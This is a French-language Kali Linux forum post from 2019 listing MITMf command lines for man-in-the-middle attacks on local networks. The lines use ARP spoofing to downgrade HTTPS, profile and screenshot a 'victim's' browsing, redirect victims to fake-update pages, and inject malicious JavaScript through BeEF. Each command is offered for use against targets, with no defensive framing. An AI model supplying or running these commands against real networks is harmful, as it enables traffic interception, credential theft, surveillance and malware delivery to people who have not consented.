Le Forum francophone communautaire des utilisateurs de Kali linux

Tout le reste ici => Vrac => Discussion démarrée par: Frenchcore44 le 04 mars 2019 à 21:29:42

Titre: Commande MITMf
Posté par: Frenchcore44 le 04 mars 2019 à 21:29:42
Salut je vais vous présentez quelque commande du framework MITMF


https://github.com/byt3bl33d3r/MITMf


Cette commande permet de bypass le https en http, les résultats se seront stocker dans le fichier /MITMf/log/mitmf.log

python mitmf.py -i wlan0 --spoof --arp --hsts --dns --gateway 192.168.&.& --target 192.168.&.& 

Cette commande permet d'avoir des information sur la navigateur web de notre victime et de savoir les site sur quel elle est

python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.&.& --browserprofiler
Cette commande permet de prendre des screenshots sur le navigateur web de notre victime attention fonctionnent que sur les site http
Résultats stocker dans le dossier /MITMf/logs

python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.&.& --screen

Cette commande permet de inversé le page de web de notre victime en 180° attention fonctionnent que sur les sites en http

python mitmf.py --spoof --arp -i wlan0 --gateway 192.168.&.& --upsidedownternet
Cette la c'est commande préférer commande elle permet de redirect sur notre victime sur un url, utilise pour les fakeupdate, attention marche sur les site en http

python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.&.& --captive --portalurl http://192.168.&.&
Injection de code via malveillant javascript en utilisant le framework beff-xss
 
python mitmf.py -i wlan0 --gateway 192.168.&.& --target 192.168.&.& --spoof --arp --inject --js-url           

--gateway &.&.&.&                                   = tout le résaux local cibler
--gateway &.&.&.& --target &.&.&.&                  = un seul machine cibler
--gateway &.&.&.& --target &.&.&.&,&.&.&.&          = plusieur machines cibler